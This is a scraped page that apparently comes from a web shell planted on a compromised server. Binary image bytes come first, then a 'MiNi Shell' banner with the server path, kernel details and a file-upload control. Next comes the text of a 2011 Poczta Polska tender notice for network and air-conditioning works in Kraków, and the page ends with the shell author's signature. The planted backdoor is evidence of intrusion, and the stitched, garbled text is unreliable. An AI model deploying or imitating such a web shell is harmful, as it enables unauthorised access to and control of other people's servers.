JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111102/361288-N-2011.html

<p class="kh_header"><b>Kraków: Jednoczesne zaprojektowanie i wykonanie robót - elektrycznych, sieci strukturalnych, instalacyjnych klimatyzacji wraz z dostawą urządzeń aktywnych i towarzyszącymi robotami</b><br>
<b>Numer ogłoszenia: 361288 - 2011; data zamieszczenia: 02.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie , ul. Bronowicka 44, 30-093 Kraków, woj. małopolskie, tel. 12 6190516.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Jednoczesne zaprojektowanie i wykonanie robót - elektrycznych, sieci strukturalnych, instalacyjnych klimatyzacji wraz z dostawą urządzeń aktywnych i towarzyszącymi robotami.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia obejmuje łączną realizację:
 	-      zaprojektowanie instalacji elektrycznych, sieci strukturalnych, instalacji klimatyzacji   
-	wykonanie w oparciu o w/w projekt, robót: elektrycznych, sieci strukturalnych, instalacyjnych klimatyzacji   
-	dostawę urządzeń aktywnych sieci LAN i robotami towarzyszącymi 
-	modernizację centrali telefonicznej 
związanych z rozbudową i modernizacją sieci strukturalnych oraz serwerowni w trzech obiektach pocztowych w Krakowie. 

2.	Miejsca realizacji wykonania robót 
Prace związane z rozbudową i modernizacją sieci strukturalnych oraz serwerowni będą wykonywane w obiektach pocztowych:
-	Budynek administracyjny Kraków ul. Grochowska 2
-	Budynek administracyjno-eksploatacyjny  WER Kraków  ul.  Prokocimska 6
-	Budynek administracyjno-eksploatacyjny  ul. Bronowicka 44 

3.	Prace projektowe, roboty instalacyjne wraz dostawą urządzeń aktywnych sieci LAN i montażem instalacji klimatyzacji  oraz roboty towarzyszące, objęte przedmiotem umowy, będą wykonane zgodnie ze szczegółowymi wymaganiami Zamawiającego określonymi w Programie funkcjonalno-użytkowym zamówienia.

4.	Terminy  realizacji  przedmiotu zamówienia 
	Wykonawca jest zobowiązany do realizacji przedmiotu zamówienia w następujących etapach:
1)	Etap I  obejmuje:
       a)  opracowanie dokumentacji projektowych dla rozbudowy i modernizacji sieci strukturalnych oraz serwerowni              
            w 3 obiektach pocztowych określonych w p-cie 2  
b) modernizację centrali telefonicznej w obiekcie Centrum Poczty WER Kraków przy ul. Prokocimskiej 6
	-  do 2 tygodni od daty zawarcia umowy
2)	Etap II - wykonanie robót rozbudowy i modernizacji sieci strukturalnych oraz serwerowni w 2 obiektach pocztowych w Krakowie: przy ul. Grochowskiej 2 i ul. Prokocimskiej 6 -  do 2 tygodni od daty przekazania terenu robót
3)	Etap III - wykonanie robót rozbudowy i modernizacji sieci strukturalnej oraz serwerowni w obiekcie pocztowym w Krakowie przy ul. Bronowickiej 44, który Zamawiający udostępni Wykonawcy po zakończeniu realizacji etapu II            i po przeprowadzeniu przez Zamawiającego alokacji pracowników wraz z wyposażeniem z obiektów przy ul. Bronowickiej 44 do obiektu przy ul. Grochowskiej 2 oraz Prokocimskiej 6 w Krakowie - do 3 tygodni od daty przekazania terenu robót

5.	Zakres prac projektowych wchodzących w skład przedmiotu zamówienia, obejmuje wykonanie w ramach realizacji etapu I zadania, dokumentacji projektowych wskazanych w programie funcjonalno-użytkowym, określającym  opracowania stanowiące zawartość dokumentacji 

6.	Opracowana dokumentacja projektowa objęta przedmiotem zamówienia  pozwoli, bez konieczności dokonania jej uzupełnień bądź wykonania dodatkowych opracowań projektowych lub uzgodnień, wykonać całość robót objętych   etapem II i III realizacji zamówienia.

7.	 Zakres robót instalacyjnych wraz z dostawą urządzeń aktywnych sieci LAN i robotami towarzyszącymi, wykonywanych w ramach etapu II i III, zawiera program funcjonalno-użytkowy.                  Prace związane z wykonaniem robót rozbudowy i modernizacji sieci strukturalnych oraz serwerowni w obiektach pocztowych określonych w p-cie 2, będą wykonane w oparciu o dokumentację techniczną sporządzoną w ramach etapu 1 realizacji zamówienia.

8.	Przedmiot zamówienia określony w p-cie 1 - 7,  zostanie wyceniony przez Wykonawcę zgodnie z Tabelą elementów rozliczeniowych umowy, w oparciu o zasady opisane w SIWZ. 

9.	Oferowanie produktów równoważnych 
1)	Z uwagi na przeznaczenie przedmiotu zamówienia i specyfikę zamówienia (współpraca z istniejącymi urządzeniami sieci LAN i serwerowniami) w załącznikach SIWZ ( tj. programie funkcjonalno-uzytkowym, tabeli elementów rozliczeniowych umowy oraz urządzeniach oferowanych) - wskazano nazwy produktów, które Zamawiający chce otrzymać.
2)	Zgodnie z art. 29 ust. 3 ustawy prawo zamówień publicznych Zamawiający dopuszcza możliwość złożenia oferty równoważnej. Oferowany asortyment powinien być zgodny z parametrami urządzeń wskazanymi w SIWZ (program funkcjonalno-użytkowy i tabela elementów rozliczeniowych) lub równoważny.
3)	Za produkty równoważne Zamawiający uzna takie, które będą posiadać parametry techniczne (cechy funkcjonalne) identyczne bądź lepsze w stosunku do parametrów pożądanych, określonych przez Zmawiającego.
Porównywane będą parametry (cechy funkcjonalne ) określone w programie funkcjonalno-użytkowym i tabeli elementów rozliczeniowych z danymi określonymi przez Wykonawcę w ofercie.
4)	Czynność udokumentowania równoważności spoczywa na Wykonawcy.  Zamawiający zastrzega sobie możliwość zażądania od Wykonawcy udokumentowania powyższego faktu poprzez przedłożenie odpowiednich dokumentów np. kart katalogowych produktu, potwierdzających równoważność parametrów zaproponowanych urządzeń.
5)	Składając ofertę równoważną wykonawca wpisuje w ofercie produkty, które oferuje jako  równoważne - wpisując parametry i cechy funkcjonalne oferowanych urządzeń, odpowiednio do SIWZ. 
6)	 W przypadku zaoferowania produktów identycznych z nazwy i o identycznych parametrach jak określone przez Zamawiającego - oferta musi zostać opisana w sposób analogiczny jak w p-cie 5. 

10.	 Do zadań Wykonawcy należy również zapewnienie Koordynatora sprawującego nadzór nad bezpieczeństwem i   higieną pracy podczas realizacji zamówienia. Z tego tytułu koszt ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.10.00-4, 71.32.80.00-3, 45.31.00.00-3, 45.31.21.00-8, 45.31.22.00-9, 45.31.42.00-3, 45.31.43.20-0, 45.33.12.20-4, 45.42.11.31-1, 45.42.21.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości:
-  5 000,00 zł (słownie: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek - dotyczący posiadania wiedzy i doświadczenia.  
	W celu wykazania spełniania przez wykonawcę warunku o którym mowa powyżej Wykonawca jest zobowiązany przedstawić:
Wykaz robót budowlanych wykonanych (zrealizowanych i rozliczonych) w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, przedmiotu i wartości, daty i miejsca wykonania oraz odbiorców wraz z załączeniem dokumentów potwierdzających, że roboty zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Za spełnienie tych warunków Zamawiający uzna wykazanie, iż Wykonawca wykonał  należycie w powyższym okresie: - co najmniej 2 zadania (zrealizowane w ramach oddzielnych umów),  obejmujące łącznie zaprojektowanie i jednoczesne wykonanie robót - związanych z rozbudową i lub modernizacją sieci strukturalnych i serwerowni,  o wartości minimum 100 000 zł brutto każdego z zadań.   

W tym celu wykonawca musi sporządzić i podpisać wykaz robót budowlanych wraz z pracami projektowymi wg schematu oraz musi załączyć do oferty dokumenty potwierdzające, że te roboty i usługi zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Określenie odbiorców zrealizowanych zadań następuje przez podanie ich nazw i adresów w sposób umożliwiający ich identyfikację.    
Za dokumenty potwierdzające należyte wykonanie robót budowlanych i usług określonych w wykazie, Zamawiający uzna np. referencje lub protokoły końcowego odbioru. 
Załączone dokumenty winny w sposób jednoznaczny wskazywać roboty i usługi wykazane oraz potwierdzać ich należyte i prawidłowe wykonanie, zgodne z zasadami sztuki budowlanej. 

2. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
W tym przypadku wymagane jest, aby inny podmiot brał udział w wykonywaniu części zamówienia. Należy wskazać jaką część zamówienia będzie wykonywał inny podmiot, na wiedzy i doświadczeniu którego Wykonawca będzie polegał.    

3. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.  O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek - dotyczący dysponowania osobami zdolnymi do wykonania zamówienia.
Wykonawca winien dysponować osobami posiadającymi:
1).	zawodowe uprawnienia projektowo - budowlane w zakresie:
a)	projektowania urządzeń oraz instalacji elektrycznych dla osób opracowujących dokumentację projektową
b)	projektowania instalacji sanitarnych dla osób opracowujących dokumentację klimatyzatora
2).	uprawnienia niezbędne do wykonywania prac określonych w dokumentacjach technicznych wymagane przepisami ustawy Prawo Budowlane w zakresie kierowania robotami branżowymi tj. elektrycznymi, sanitarnymi, 
3).	aktualne członkostwo Izby Inżynierów Budownictwa (Samorządu Zawodowego) dla osób posiadających uprawnienia wymienione w punkcie 1) oraz 2)
4).	Zamawiający dopuszcza równoważne kwalifikacje, zdobyte w innych państwach na zasadach określonych w art. 12 a) ustawy z dnia 7 lipca 1994 r. Prawo Budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z dnia 17 kwietnia 2008r. z póź. zm.) oraz na podstawie art. 20 a) ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z dnia 24 stycznia 2001 r. z póź. zm.).

W celu wykazania spełniania przez wykonawcę warunku, o którym mowa powyżej, Wykonawca jest zobowiązany przedstawić:
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi-elektrycznymi i sanitarnymi oraz opracowujących dokumentacje projektowe instalacji elektrycznych i sanitarnych, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia oraz informacji o podstawie do dysponowania tymi osobami.
Wykonawca sporządzi wykaz wg schematu i dołączy go do składanej oferty: 
      
Za spełnienie tego warunku zamawiający uzna wykazanie, iż wykonawca dysponuje: pracownikami projektowymi, oraz osobami pełniącymi funkcję Kierowników robót branżowych tj. elektrycznych i sanitarnych, posiadających odpowiednie uprawnienia (odpowiednio do pkt. 1 i 2 ).  

2.	Na potwierdzenie, że osoby wskazane w wykazie, o którym mowa w pkt. 1 posiadają  wymagane kwalifikacje,  wraz z ofertą należy złożyć oświadczenie  o posiadaniu przez te osoby stosownych uprawnień oraz aktualnego członkostwa w Izbie Inżynierów Budownictwa,  opisanych w w/w wykazie.  

3.  W przypadku gdy Wykonawca będzie polegał na osobach zdolnych do wykonania zamówienia innych podmiotów,  niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest przedstawić Zamawiającemu, pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji tych osób na okres wykonywania przedmiotu zamówienia.  

4. Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia-nie spełnia na dzień upływu terminu do składania oferty, w oparciu o informacje zawarte w dokumentach wymienionych powyżej. Z treści dokumentów musi wynikać jednoznacznie, iż warunek Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Podpisany formularz oferty - który należy umieścić jako pierwszą stronę oferty.
2. Wypełnioną i podpisaną - tabelę elementów rozliczeniowych.
3. Wypełnioną i podpisaną kartę - oferowane urządzenia .
4.  Dowód wniesienia wadium - jeżeli wadium wniesione będzie przelewem; jeżeli wadium wniesione będzie w formie gwarancji lub poręczenia, do oferty należy załączyć potwierdzoną kopię poręczeń lub gwarancji oraz do koperty oryginał luzem.
5.  Zamawiający żąda, aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty, tj. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub inny dokument potwierdzający powyższe. Wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
6. Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o którym mowa w ust. 5, do oferty należy dołączyć także pełnomocnictwo w oryginale  lub w postaci kopii poświadczonej notarialnie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwe zmiany postanowień umowy:
1)    Zmiany terminów wykonania przedmiotu umowy w przypadku: 
a)	działania siły wyższej, o której mowa w umowie,
b)	opóźnienia Zamawiającego w przekazaniu terenu wykonania robót objętych poszczególnymi etapami realizacji zadania inwestycyjnego,
c)	okoliczności leżących po stronie Zamawiającego, w szczególności:
       zgłoszenia przez Zamawiającego konieczności czasowego wstrzymania prac z uwagi na zaistniałe uwarunkowania funkcjonalno-eksploatacyjne w obiektach  pocztowych objętych przedmiotem umowy, które będą czynne w okresie realizacji umowy lub inne. W tym przypadku Wykonawca  akceptuje  możliwość wprowadzenia przez Zamawiającego czasu (stop) w  realizacji umowy na czas  do 1 miesiąca.

2).  W przypadku wystąpienia którejkolwiek z okoliczności wymienionych we wzorze umowy, termin wykonania umowy ulegnie odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób  należyty, nie dłużej jednak niż o okres trwania tych okoliczności.

3).   Zmiany osobowe:
               - zmiana na inne osoby, osób, o których mowa we wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie ul. Bronowicka 44 pok. 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2011 godzina 11:00, miejsce: Poczta Polska S.A. Centrum Infrastruktury Oddział Regionalny w Krakowie ul. Bronowicka 44 pok. 217.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 19.12.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com